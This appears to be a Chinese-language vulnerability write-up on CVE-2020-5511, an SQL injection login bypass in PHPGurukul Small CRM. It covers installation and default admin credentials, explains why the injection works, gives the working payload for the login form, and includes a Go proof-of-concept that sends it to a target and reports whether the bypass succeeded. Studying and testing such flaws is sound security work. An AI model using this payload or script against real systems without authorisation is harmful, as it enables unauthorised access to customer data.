产品介绍

PHPGurukul Small CRM是一套客户关系管理系统。

系统详情

Language Used : PHP

Database : MySQL

User Interface Design :PHP 5.6 or above , MYSQL, HTML,CSS, JAVASCRIPT, JQUERY, AJAX

Web Browser : Mozilla, Google Chrome, IE8, OPERA

Software : XAMPP / Wamp / Mamp/ Lamp (anyone)

环境搭建

​ 系统下载:https://phpgurukul.com/?smd_process_download=1&download_id=10412

安装步骤:

  1. 下载压缩包文件

  2. 解压文件拷贝crm 文件夹

  3. 粘贴到根目录(for xampp xampp/htdocs, for wamp wamp/www, for lamp var/www/html)

  4. 打开phpmyadmin (http://localhost/phpmyadmin)

  5. 创建 CRM数据库

  6. 导入crm.sql(given inside the zip package in SQL file folder)

  7. 访问 http://localhost/dfsms

tables

默认登录密码

Username: admin
Password: Test@123

index

能够登录成功说明数据库连接是没有问题的

CVE-2020-5511

漏洞详情

漏洞名: PHPGurukul Small CRM SQL注入漏洞

类型:sql注入

危险级别:高危

来源:https://www.exploit-db.com/exploits/47874

页面访问

username:’=’’or ‘1’ = ‘1’; – -

**Password:非空任意字符串

index

原理

admin’ or

admin后的引号破坏了之前的查询语句,闭合查询语句,注释了后面的内容,or ‘1’ = ‘1’保证了查询逻辑为真

登录逻辑

loginlogic

原查询语句:SELECT * FROM user WHERE email=’”.$_POST[‘email’].”‘ and password=’”.$_POST[‘password’].”‘“

更改为

SELECT * FROM user WHERE email=’”‘=’’or ‘1’ = ‘1’; – -“‘ and password=’”a”‘

selectx

成功查询到5个用户,用户数量大于0即可绕过登录

代码实现
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
// @Title  PHPGurukul Small CRM SQL注入漏洞
// @Description  PHPGurukul Small CRM SQL注入漏洞poc
// @Author  lennon
// @Update  2021-01-06
package main
import (
	"fmt"
	"io/ioutil"
	"net/http"
	"strings"
)

func main() {

	url := "http://your-ip/crm/index.php"
	method := "POST"

	payload := strings.NewReader(`email=%27%3D%27%27or++%271%27+%3D+%271%27%3B+--+-&password=a&login=`)

	client := &http.Client {
	}
	req, err := http.NewRequest(method, url, payload)

	if err != nil {
		fmt.Println(err)
		return
	}
	req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
	req.Header.Add("Cookie", "PHPSESSID=b203fa4101b75860a7eccdacf076f177")

	res, err := client.Do(req)
	if err != nil {
		fmt.Println(err)
		return
	}
	defer res.Body.Close()

	body, err := ioutil.ReadAll(res.Body)
	if err != nil {
		fmt.Println(err)
		return
	}
	if strings.Contains(string(body),`window.location.href='home.php'`){
		fmt.Println("存在CVE-2020-5511漏洞")
	}else{
		fmt.Println("未检测到CVE-2020-5511漏洞")
	}
}

github:–>传送门<–